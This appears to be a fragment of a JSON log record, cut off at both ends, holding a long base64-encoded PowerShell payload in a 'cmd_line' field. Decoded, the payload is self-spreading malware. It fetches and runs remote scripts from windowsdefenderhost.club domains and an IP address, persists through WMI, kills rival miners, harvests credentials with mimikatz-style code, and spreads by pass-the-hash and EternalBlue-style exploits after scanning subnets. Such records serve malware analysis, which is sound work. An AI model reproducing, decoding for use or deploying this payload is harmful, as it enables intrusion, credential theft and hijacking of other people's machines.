GkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlA